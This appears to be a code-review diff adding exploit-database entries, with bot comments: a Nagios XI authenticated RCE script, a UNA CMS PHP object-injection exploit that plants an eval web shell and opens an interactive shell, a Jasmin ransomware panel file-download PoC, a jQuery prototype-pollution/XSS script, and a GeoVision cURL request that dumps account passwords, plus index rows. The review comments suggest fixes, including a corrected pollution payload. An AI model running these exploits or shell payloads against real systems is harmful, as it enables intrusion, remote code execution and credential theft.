file_data = {
|
||||
"upload": "1",
|
||||
"nsp": nsp[0],
|
||||
"MAX_FILE_SIZE": "20000000"
|
||||
}
|
||||
file_upload = {
|
||||
"uploadedfile": ("check_ping", payload, "application/octet-stream", {"Content-Disposition": "form-data"})
|
||||
}
|
||||
session.post(upload_url, data=file_data, files=file_upload, verify=not self.ignore_ssl)
|
||||
payload_url = self.url + self.parameter + "/includes/components/profile/profile.php?cmd=download"
|
||||
session.get(payload_url, verify=not self.ignore_ssl)
|
||||
|
||||
def login(self):
|
||||
session = requests.Session()
|
||||
login_url = self.url + self.parameter + "/login.php"
|
||||
token = session.get(login_url, verify=not self.ignore_ssl)
|
||||
nsp = re.findall('name="nsp" value="(.*)">', token.text)
|
||||
print("Login NSP Token: " + nsp[0])
|
||||
post_data = {
|
||||
"nsp": nsp[0],
|
||||
"page": "auth",
|
||||
"debug": "",
|
||||
"pageopt": "login",
|
||||
"redirect": "",
|
||||
"username": self.username,
|
||||
"password": self.password,
|
||||
"loginButton": ""
|
||||
}
|
||||
login = session.post(login_url, data=post_data, verify=not self.ignore_ssl)
|
||||
if "Home Dashboard" in login.text:
|
||||
print("Logged in!")
|
||||
else:
|
||||
print("Unable to login!")
|
||||
self.upload(session)
|
||||
|
||||
if __name__ == "__main__":
|
||||
parser = argparse.ArgumentParser(description='CVE-2019–15949 Nagiosxi authenticated Remote Code Execution')
|
||||
parser.add_argument('-t', metavar='<Target base URL>', help='Example: -t http://nagios.url/', required=True)
|
||||
parser.add_argument('-b', metavar='<Base Directory>', help="Example: -b /nagiosxi/", required=True)
|
||||
parser.add_argument('-u', metavar='<Username>', help="Example: -a username", required=True)
|
||||
parser.add_argument('-p', metavar='<Password>', help="Example: -p 'password'", required=True)
|
||||
parser.add_argument('-lh', metavar='<Listener IP>', help="Example: -lh 127.0.0.1", required=True)
|
||||
parser.add_argument('-lp', metavar='<Listener Port>', help="Example: -lp 1337", required=True)
|
||||
parser.add_argument('-k', action='store_true', help="Ignore SSL certificate verification")
|
||||
args = parser.parse_args()
|
||||
|
||||
|
||||
urllib3.disable_warnings()
|
||||
|
||||
try:
|
||||
print('CVE-2019-15949 Nagiosxi authenticated Remote Code Execution')
|
||||
Nagiosxi(args.t, args.b, args.u, args.p, args.lh, args.lp, args.k)
|
||||
except KeyboardInterrupt:
|
||||
print("\nBye Bye!")
|
||||
exit()
|
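Review bot: `login()` does not abort on failure. After the `"Home Dashboard" in login.text` check prints "Unable to login!" the method falls through to `self.upload(session)` anyway, so a wrong password still fires the plugin upload and the `profile.php?cmd=download` trigger with an unauthenticated session. Return or raise in the else branch, and guard both `re.findall(...)` results before indexing `nsp[0]`, which raises `IndexError` when the page carries no token (for example when `-b` points at the wrong base path). Worth stating in the header for operators: the payload is uploaded under the filename `check_ping`, so a successful run replaces the target's real check_ping plugin and breaks ping checks until it is restored. Cosmetic: the `-u` option's help text reads `Example: -a username`, and the `argparse` description contains an en dash in `CVE-2019–15949` that will not match a copy-paste search for the CVE id.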
125
exploits/multiple/webapps/52139.txt
Normal file
|
@ -0,0 +1,125 @@
|
|||
# Exploit Title: UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
|
||||
# Author: Egidio Romano aka EgiX
|
||||
# Software link.......: https://unacms.com
|
||||
|
||||
|
||||
[-] Software Links:
|
||||
https://unacms.com
|
||||
https://github.com/unacms/una
|
||||
|
||||
[-] Affected Versions:
|
||||
All versions from 9.0.0-RC1 to 14.0.0-RC4.
|
||||
|
||||
[-] Vulnerability Description:
|
||||
The vulnerability is located in the
|
||||
/template/scripts/BxBaseMenuSetAclLevel.php script. Specifically,
|
||||
within the BxBaseMenuSetAclLevel::getCode() method. When calling this
|
||||
method, user input passed through the "profile_id" POST parameter is
|
||||
not properly sanitized before being used in a call to the
|
||||
unserialize() PHP function. This can be exploited by remote,
|
||||
unauthenticated attackers to inject arbitrary PHP objects into the
|
||||
application scope, allowing them to perform a variety of attacks, such
|
||||
as writing and executing arbitrary PHP code.
|
||||
|
||||
<?php
|
||||
|
||||
/*
|
||||
------------------------------------------------------------------------------------
|
||||
UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
|
||||
------------------------------------------------------------------------------------
|
||||
|
||||
author..............: Egidio Romano aka EgiX
|
||||
mail................: n0b0d13s[at]gmail[dot]com
|
||||
software link.......: https://unacms.com
|
||||
|
||||
+-------------------------------------------------------------------------+
|
||||
| This proof of concept code was written for educational purpose only. |
|
||||
| Use it at your own risk. Author will be not responsible for any damage. |
|
||||
+-------------------------------------------------------------------------+
|
||||
|
||||
[-] Vulnerability Description:
|
||||
|
||||
The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script.
|
||||
Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this
|
||||
method, user input passed through the "profile_id" POST parameter is not properly
|
||||
sanitized before being used in a call to the unserialize() PHP function. This can be
|
||||
exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into
|
||||
the application scope, allowing them to perform a variety of attacks, such as
|
||||
writing and executing arbitrary PHP code.
|
||||
|
||||
[-] Original Advisory:
|
||||
|
||||
https://karmainsecurity.com/KIS-2025-01
|
||||
*/
|
||||
|
||||
set_time_limit(0);
|
||||
error_reporting(E_ERROR);
|
||||
|
||||
print "\n+------------------------------------------------------------+";
|
||||
print "\n| UNA CMS <= 14.0.0-RC4 PHP Object Injection Exploit by EgiX |";
|
||||
print "\n+------------------------------------------------------------+\n";
|
||||
|
||||
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
|
||||
|
||||
if ($argc != 2)
|
||||
{
|
||||
print "\nUsage......: php $argv[0] <URL>\n";
|
||||
print "\nExample....: php $argv[0] http://localhost/una/";
|
||||
print "\nExample....: php $argv[0] https://unacms.com/\n\n";
|
||||
die();
|
||||
}
|
||||
|
||||
define('ON_APACHE', true);
|
||||
define('SH_PATH', ON_APACHE ? './cache_public/sh.phtml' : './cache_public/sh.php');
|
||||
|
||||
class GuzzleHttp_Cookie_SetCookie
|
||||
{
|
||||
private $data = ['Expires' => '', 'Value' => '<?php eval(base64_decode($_SERVER[\'HTTP_C\'])); ?>'];
|
||||
}
|
||||
|
||||
class GuzzleHttp_Cookie_FileCookieJar
|
||||
{
|
||||
private $cookies, $filename = SH_PATH, $storeSessionCookies = true;
|
||||
|
||||
function __construct()
|
||||
{
|
||||
$this->cookies = [new GuzzleHttp_Cookie_SetCookie];
|
||||
}
|
||||
}
|
||||
|
||||
$url = $argv[1];
|
||||
$ch = curl_init();
|
||||
|
||||
$chain = serialize(new GuzzleHttp_Cookie_FileCookieJar);
|
||||
$chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain);
|
||||
$chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain);
|
||||
|
||||
curl_setopt($ch, CURLOPT_URL, "{$url}menu.php");
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
|
||||
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
|
||||
curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain));
|
||||
|
||||
print "\n[+] Performing PHP Object Injection";
|
||||
|
||||
curl_exec($ch); curl_close($ch);
|
||||
|
||||
print "\n[+] Launching shell\n";
|
||||
|
||||
$ch = curl_init();
|
||||
|
||||
curl_setopt($ch, CURLOPT_URL, $url . SH_PATH);
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
|
||||
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
|
||||
|
||||
$phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';";
|
||||
|
||||
while(1)
|
||||
{
|
||||
print "\nuna-shell# ";
|
||||
if (($cmd = trim(fgets(STDIN))) == "exit") break;
|
||||
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
|
||||
preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
|
||||
}
|
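Review bot: the chain drops an unauthenticated web shell (`eval(base64_decode($_SERVER['HTTP_C']))`) at `./cache_public/sh.phtml` and the script never removes it; after `exit` in the `una-shell#` loop the file stays reachable by anyone who requests `{$url}cache_public/sh.phtml` and sets a `C:` header. Add a cleanup step (the shell can `unlink(__FILE__)` itself on an `exit` command) or at least say in the header that the file must be deleted by hand. Two editorial points: the vulnerability description appears twice, once under `[-] Vulnerability Description:` before the `<?php` tag and again inside the PHP comment block, so one copy should go; and `ON_APACHE` is a hardcoded `define()` with no command-line switch, so on a non-Apache target the `.phtml` path is wrong unless the constant is edited before running.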
71
exploits/multiple/webapps/52140.txt
Normal file
|
@ -0,0 +1,71 @@
|
|||
# Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download
|
||||
# Google Dork: N/A
|
||||
# Date: 22-03-2025
|
||||
# Exploit Author: bRpsd cy[at]live.no
|
||||
# Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
|
||||
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
|
||||
# Version: N/A
|
||||
# Tested on: MacOS local xampp
|
||||
|
||||
|
||||
Authentication can be easily bypassed due to SQL Injection as mentioned in:
|
||||
https://www.exploit-db.com/exploits/52091
|
||||
|
||||
|
||||
|
||||
Vulnerable file:Web Panel/download_file.php
|
||||
Vulnerable parameter:file
|
||||
Vulnerable code:
|
||||
<?php
|
||||
session_start();
|
||||
if(!isset($_SESSION['username']) ){
|
||||
header("Location: login.php");
|
||||
}
|
||||
$file=$_GET['file'];
|
||||
if(!empty($file)){
|
||||
// Define headers
|
||||
header("Cache-Control: public");
|
||||
header("Content-Description: File Transfer");
|
||||
header("Content-Disposition: attachment; filename=$file");
|
||||
header("Content-Type: text/encoded");
|
||||
header("Content-Transfer-Encoding: binary");
|
||||
|
||||
// Read the file
|
||||
readfile($file);
|
||||
exit;
|
||||
}else{
|
||||
echo 'The file does not exist.';
|
||||
}
|
||||
?>
|
||||
|
||||
|
||||
Proof of concept:
|
||||
|
||||
http://localhost/Jasmin-Ransomware/Web Panel/download_file.php?file=database/db_conection.php
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br, zstd
|
||||
Connection: keep-alive
|
||||
Cookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-Fetch-Dest: document
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-Site: none
|
||||
Sec-Fetch-User: ?1
|
||||
|
||||
GET: HTTP/1.1 200 OK
|
||||
Date: Sat, 22 Mar 2025 09:42:09 GMT
|
||||
Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1
|
||||
X-Powered-By: PHP/7.4.29
|
||||
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
||||
Cache-Control: public
|
||||
Pragma: no-cache
|
||||
Content-Description: File Transfer
|
||||
Content-Disposition: attachment; filename=database/db_conection.php
|
||||
Content-Transfer-Encoding: binary
|
||||
Content-Length: 95
|
||||
Keep-Alive: timeout=5, max=100
|
||||
Connection: Keep-Alive
|
||||
Content-Type: text/encoded;charset=UTF-8
|
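Review bot: the quoted `download_file.php` redirects unauthenticated users with `header("Location: login.php");` but never calls `exit`, so execution continues into `readfile($file)` and the file body is sent along with the 302. The `(Authenticated)` qualifier in the title therefore understates the issue, and the SQL injection from 52091 is not needed to reach the read; replaying the PoC request without the `Cookie: PHPSESSID=...` line would confirm it and belongs in the advisory. Two smaller points: the parameter goes straight into `readfile()` with no base-directory check, so any path readable by the web server user is exposed, not just files under the panel; and the PoC URL has an unencoded space in `Web Panel/`, which must be `Web%20Panel/` in a raw request.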
72
exploits/multiple/webapps/52141.txt
Normal file
|
@ -0,0 +1,72 @@
|
|||
# Exploit Title: jQuery Prototype Pollution & XSS Exploit (CVE-2019-11358 & CVE-2020-7656)
|
||||
# Google Dork: N/A
|
||||
# Date: 2025-02-13
|
||||
# Exploit Author: xOryus
|
||||
# Vendor Homepage: https://jquery.com
|
||||
# Software Link: https://code.jquery.com/jquery-3.3.1.min.js
|
||||
# Version: 3.3.1
|
||||
# Tested on: Windows 10, Ubuntu 20.04, Chrome 120, Firefox 112
|
||||
# CVE : CVE-2019-11358, CVE-2020-7656
|
||||
# Category: WebApps
|
||||
|
||||
# Description:
|
||||
# This exploit abuses two vulnerabilities in jQuery:
|
||||
# - CVE-2020-7656: XSS via improper script handling
|
||||
# - CVE-2019-11358: Prototype Pollution leading to XSS
|
||||
# By injecting payloads into a vulnerable page using jQuery <3.4.X, attackers can execute arbitrary JavaScript in the victim's browser.
|
||||
#
|
||||
# Usage:
|
||||
# 1. Load this script in a page that includes jQuery 3.3.1
|
||||
# 2. Observe two XSS alerts via script injection and prototype pollution.
|
||||
|
||||
# PoC (Proof of Concept):
|
||||
# ------------------------------------
|
||||
|
||||
/*
|
||||
* Exploit for CVE-2020-7656 and CVE-2019-11358
|
||||
* Injects malicious JavaScript into a vulnerable page using jQuery <3.4.X
|
||||
*/
|
||||
|
||||
COPY ALL PAYLOAD AND INSERT ON SITE AND IN BROWSER CONSOLE (F12)
|
||||
|
||||
// 1. Load vulnerable jQuery (version 3.3.1)
|
||||
const script = document.createElement('script');
|
||||
script.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js";
|
||||
document.head.appendChild(script);
|
||||
|
||||
// 2. Function to execute after jQuery is loaded
|
||||
script.onload = function() {
|
||||
console.log("[+] Vulnerable jQuery loaded!");
|
||||
|
||||
// 3. Inject malicious content for XSS (CVE-2020-7656)
|
||||
const maliciousContent = "<script>alert('XSS via CVE-2020-7656: ' + document.domain)</script >"; // Space after </script>
|
||||
$('body').append(maliciousContent);
|
||||
console.log("[+] XSS payload (CVE-2020-7656) injected. Alert will be displayed.");
|
||||
|
||||
// 4. Exploit Prototype Pollution (CVE-2019-11358)
|
||||
const defaultConfig = {
|
||||
"backLink": "<a href='https://example.com'>Go Back</a>"
|
||||
};
|
||||
|
||||
const maliciousParams = {
|
||||
"__proto__": {
|
||||
"backLink": "<svg onload=alert('XSS via CVE-2019-11358: Prototype Pollution!')>"
|
||||
}
|
||||
};
|
||||
|
||||
// 5. Merge objects using vulnerable $.extend
|
||||
let config = $.extend(true, defaultConfig, maliciousParams);
|
||||
console.log("[+] Prototype Pollution executed via $.extend().");
|
||||
|
||||
// 6. Create a container to inject malicious content
|
||||
const container = document.createElement('div');
|
||||
container.id = 'backLinkContainer';
|
||||
document.body.appendChild(container);
|
||||
|
||||
// 7. Inject malicious content into the DOM
|
||||
$('#backLinkContainer').html(config.backLink);
|
||||
console.log("[+] XSS payload (CVE-2019-11358) injected into the DOM. Alert will be displayed.");
|
||||
};
|
||||
|
||||
// 8. Instruction message
|
||||
console.log("[*] Script injected. Waiting for jQuery to load...");
|
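Review bot: the prototype-pollution step does not pollute anything. In `const maliciousParams = { "__proto__": { "backLink": ... } }` the `__proto__` key of an object literal sets the prototype of `maliciousParams` instead of creating an own `"__proto__"` property, so `$.extend(true, defaultConfig, maliciousParams)` never touches `Object.prototype`; the alert fires only because `extend`'s `for...in` walks the inherited `backLink` and copies it onto `defaultConfig`, an ordinary property overwrite. For CVE-2019-11358 the key must arrive as an own property, e.g. `$.extend(true, {}, JSON.parse('{"__proto__":{"backLink":"<svg onload=alert(1)>"}}'))`, and the proof is that `({}).backLink` is set afterwards on 3.3.1 and undefined on 3.4.0 and later. The first step has the same problem: `$('body').append("<script>…</script >")` runs because jQuery evaluates inline scripts on DOM insertion by design, whereas CVE-2020-7656 is the `.load()` script-tag stripping bypass in jQuery before 1.9.0 and does not apply to the 3.3.1 build this file loads from ajax.googleapis.com. Either retarget that step at a pre-1.9.0 build via `.load()` or drop the CVE from the title.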
46
exploits/multiple/webapps/52144.txt
Normal file
|
@ -0,0 +1,46 @@
|
|||
# Exploit Title: Information Disclosure in GeoVision GV-ASManager
|
||||
# Google Dork: inurl:"ASWeb/Login"
|
||||
# Date: 02-FEB-2025
|
||||
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
|
||||
# Vendor Homepage: https://www.geovision.com.tw/
|
||||
# Software Link: https://www.geovision.com.tw/download/product/
|
||||
# Version: 6.1.0.0 or less
|
||||
# Tested on: Windows 10 | Kali Linux
|
||||
# CVE : CVE-2024-56902
|
||||
# PoC: https://github.com/DRAGOWN/CVE-2024-56902
|
||||
|
||||
|
||||
Information disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.
|
||||
|
||||
Requirements
|
||||
To perform successful attack an attacker requires:
|
||||
- GeoVision ASManager version 6.1.0.0 or less
|
||||
- Network access to the GV-ASManager web application (there are cases when there are public access)
|
||||
- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)
|
||||
|
||||
Impact
|
||||
The vulnerability can be leveraged to perform the following unauthorized actions:
|
||||
A low privilege account is able to:
|
||||
- Enumerate user accounts
|
||||
- Retrieve cleartext password of any account in GV-ASManager.
|
||||
After reusing the retrieved password, an attacker will be able to:
|
||||
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
|
||||
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
|
||||
- Disrupt and disconnect services such as monitoring cameras, access controls.
|
||||
- Clone and duplicate access control data for further attack scenarios.
|
||||
- Reusing retrieved password in other digital assets of the organization.
|
||||
|
||||
cURL script:
|
||||
|
||||
curl --path-as-is -i -s -k -X $'POST' \
|
||||
-H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \
|
||||
-b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
|
||||
--data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
|
||||
$'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'
|
||||
|
||||
|
||||
After a successful attack, you will get access to:
|
||||
- ASWeb - Access & Security Management
|
||||
- TAWeb - Time and Attendance Management
|
||||
- VMWeb - Visitor Management
|
||||
- ASManager - Access & Security Management software in OS
|
|
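Review bot: the cURL command is a verbatim browser export and several headers fight the `[SET-TARGET]` placeholder: `Origin: https://192.168.50.129` is the author's lab host, and `Content-Length: 41` is only correct while the body stays exactly `action=UA_GetAllUserAccount&node=xnode-98`. Trim it to the headers the endpoint needs (`Host`, `Cookie`, `Content-Type`, `X-Requested-With`), let curl compute the length, and give the final URL a scheme (`https://[SET-TARGET]/ASWeb/bin/ASWebCommon.srf`). The advisory states that `UA_GetAllUserAccount` returns the cleartext password of every account but shows no response; a redacted sample of the reply with the password field present would let readers confirm they hit the same endpoint. The `node=xnode-98` value is also unexplained; say whether it is fixed or must be copied from the reader's own session.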
@ -11031,6 +11031,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
35729,exploits/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,remote,multiple,,2011-05-09,2015-01-08,1,,,,,,https://www.securityfocus.com/bid/47780/info
|
||||
39455,exploits/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,remote,multiple,,2016-02-18,2016-02-18,0,CVE-2015-2080,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php
|
||||
46342,exploits/multiple/remote/46342.py,"Indusoft Web Studio 8.1 SP2 - Remote Code Execution",2019-02-11,"Jacob Baines",remote,multiple,,2019-02-11,2019-02-12,0,CVE-2019-6545;CVE-2019-6543,,,,,
|
||||
52142,exploits/multiple/remote/52142.py,"InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation",2025-04-08,"Andrea Pasin",remote,multiple,,2025-04-08,2025-04-08,0,CVE-2024-30896,,,,,
|
||||
30973,exploits/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution",2008-01-02,"Rich Cannings",remote,multiple,,2008-01-02,2014-01-16,1,CVE-2008-6060;OSVDB-56437,,,,,https://www.securityfocus.com/bid/27109/info
|
||||
21942,exploits/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",remote,multiple,,2002-10-15,2012-10-13,1,CVE-2002-1910;OSVDB-59780,,,,,https://www.securityfocus.com/bid/5970/info
|
||||
20468,exploits/multiple/remote/20468.txt,"Inktomi Search Software 3.0 - Information Disclosure",2000-12-05,"china nsl",remote,multiple,,2000-12-05,2012-08-13,1,OSVDB-88577,,,,,https://www.securityfocus.com/bid/2062/info
|
||||
|
@ -11486,6 +11487,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,,2008-05-08,2014-02-19,1,CVE-2008-2162;OSVDB-45017,,,,,https://www.securityfocus.com/bid/29107/info
|
||||
24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple,,2013-01-24,2013-01-24,1,CVE-2013-1359;OSVDB-89347,"Metasploit Framework (MSF)",,,,
|
||||
21453,exploits/multiple/remote/21453.txt,"SonicWALL SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",remote,multiple,,2002-05-17,2012-09-22,1,CVE-2002-2341;OSVDB-4408,,,,,https://www.securityfocus.com/bid/4755/info
|
||||
52143,exploits/multiple/remote/52143.py,"Sony XAV-AX5500 1.13 - Firmware Update Validation Remote Code Execution (RCE)",2025-04-08,lkushinada,remote,multiple,,2025-04-08,2025-04-08,0,CVE-2024-23922,,,,,
|
||||
22509,exploits/multiple/remote/22509.txt,"Sophos Products - Multiple Vulnerabilities",2012-11-05,"Tavis Ormandy",remote,multiple,,2012-11-05,2012-11-05,1,OSVDB-87063;OSVDB-87062;OSVDB-87061;OSVDB-87060;OSVDB-87059;OSVDB-87058;OSVDB-87057;OSVDB-87056,,,,,
|
||||
48587,exploits/multiple/remote/48587.py,"SOS JobScheduler 1.13.3 - Stored Password Decryption",2020-06-15,"Sander Ubink",remote,multiple,,2020-06-15,2020-06-15,0,CVE-2020-12712,,,,,
|
||||
50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",2022-06-14,Altelus,remote,multiple,,2022-06-14,2022-06-14,0,CVE-2022-23642,,,,,
|
||||
|
@ -11926,6 +11928,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
|
||||
50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
|
||||
37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
|
||||
52144,exploits/multiple/webapps/52144.txt,"GeoVision GV-ASManager 6.1.0.0 - Information Disclosure",2025-04-08,"Giorgi Dograshvili",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2024-56902,,,,,
|
||||
50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,,2021-08-05,2021-08-05,0,,,,,,
|
||||
47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,,2019-09-23,2019-09-23,0,CVE-2019-16679,,,,http://www.exploit-db.comgila-1.10.9.zip,
|
||||
49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,,2021-02-18,2021-06-14,0,,,,,,
|
||||
|
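Review bot: `date_published` for 52144 is `2025-04-08`, identical to `date_added`, while the advisory header reads `# Date: 02-FEB-2025`; the convention visible in this block (row 44623 carries `2018-05-03` as published and `2018-05-15` as added) is the author's date first, so this should be `2025-02-02`. The same correction applies to the other new rows in this commit whose headers carry earlier dates (52138 `17/02/2024`, 52140 `22-03-2025`, 52141 `2025-02-13`). The description could also state the precondition from the advisory, e.g. `GeoVision GV-ASManager 6.1.0.0 - Information Disclosure (Authenticated)`, since the request needs a session cookie, even if only the default Guest account.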
@ -11997,6 +12000,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",2021-01-06,MoeAlBarbari,webapps,multiple,,2021-01-06,2021-01-06,0,CVE-2021-3018,,,,,
|
||||
50490,exploits/multiple/webapps/50490.txt,"Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,multiple,,2021-11-03,2021-11-03,0,,,,,,
|
||||
52062,exploits/multiple/webapps/52062.py,"Ivanti vADC 9.9 - Authentication Bypass",2024-08-04,ohnoisploited,webapps,multiple,,2024-08-04,2024-08-04,0,,,,,,
|
||||
52140,exploits/multiple/webapps/52140.txt,"Jasmin Ransomware - Arbitrary File Download (Authenticated)",2025-04-08,bRpsd,webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
|
||||
44623,exploits/multiple/webapps/44623.txt,"JasperReports - (Authenticated) File Read",2018-05-03,"Hector Monsegur",webapps,multiple,,2018-05-15,2018-05-15,0,CVE-2018-5430,,,,,https://rhinosecuritylabs.com/application-security/authenticated-file-read-vulnerability-in-jasperreports/
|
||||
36575,exploits/multiple/webapps/36575.py,"JBoss AS 3/4/5/6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",webapps,multiple,,2015-04-13,2015-04-13,0,OSVDB-120064,,,,,
|
||||
35911,exploits/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",webapps,multiple,,2015-01-26,2015-01-26,0,OSVDB-117568;OSVDB-117567;CVE-2015-1478;CVE-2015-1477,,,,,
|
||||
|
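Review bot: the 52140 row keeps `Arbitrary File Download (Authenticated)` in the description, but the code quoted in the advisory performs the access check as `header("Location: login.php");` with no `exit`, so `readfile($file)` still runs for an unauthenticated request; either drop `(Authenticated)` here or keep it and have the advisory state that the check is bypassable. The empty `codes` column matches the `Version: N/A` header, so nothing to add there.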
@ -12018,6 +12022,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
48147,exploits/multiple/webapps/48147.txt,"Joplin Desktop 1.0.184 - Cross-Site Scripting",2020-03-02,"Javier Olmedo",webapps,multiple,,2020-03-02,2020-03-02,0,CVE-2020-9038,,,,,
|
||||
49767,exploits/multiple/webapps/49767.txt,"jQuery 1.0.3 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,,2021-04-14,2021-04-14,0,CVE-2020-11023,,,,,
|
||||
49766,exploits/multiple/webapps/49766.txt,"jQuery 1.2 - Cross-Site Scripting (XSS)",2021-04-14,"Central InfoSec",webapps,multiple,,2021-04-14,2021-04-14,0,CVE-2020-11022,,,,,
|
||||
52141,exploits/multiple/webapps/52141.txt,"jQuery 3.3.1 - Prototype Pollution & XSS Exploit",2025-04-08,xOryus,webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2020-7656;CVE-2019-11358,,,,,
|
||||
11218,exploits/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Arbitrary File Upload",2010-01-21,k4cp3r/Ablus,webapps,multiple,,2010-01-20,,1,,,,,http://www.exploit-db.comjquery.uploadify-v2.1.0.zip,
|
||||
